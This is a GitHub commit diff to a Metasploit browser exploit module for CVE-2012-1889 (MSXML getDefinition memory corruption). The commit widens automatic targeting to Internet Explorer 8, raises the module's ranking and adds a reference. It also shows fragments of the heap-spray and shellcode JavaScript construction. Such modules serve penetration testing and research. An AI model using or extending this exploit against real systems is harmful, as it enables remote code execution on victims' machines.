Permalink
Browse files

Additional changes

  • Loading branch information...
1 parent 50269c9 commit 256290c2061def22260cabf34055cc2d4dece5bb @sinn3r sinn3r committed Jun 18, 2012
Showing with 4 additions and 8 deletions.
  1. +4 −8 modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -8,14 +8,14 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = NormalRanking
+ Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
- :ua_maxver => "7.0",
+ :ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
@@ -29,8 +29,7 @@ def initialize(info={})
'Description' => %q{
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which
- may corrupt memory allowing remote code execution. At the moment, this module
- only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.
+ may corrupt memory allowing remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
@@ -43,6 +42,7 @@ def initialize(info={})
'References' =>
[
[ 'CVE', '2012-1889' ],
+ [ 'BID', '53934' ],
[ 'OSVDB', '82873'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
@@ -234,7 +234,6 @@ def on_request_uri(cli, request)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
- #js_90_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
if my_target['Rop'].nil?
js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
@@ -322,9 +321,6 @@ def on_request_uri(cli, request)
end
=begin
-
-* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0
-
(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

0 comments on commit 256290c

Please sign in to comment.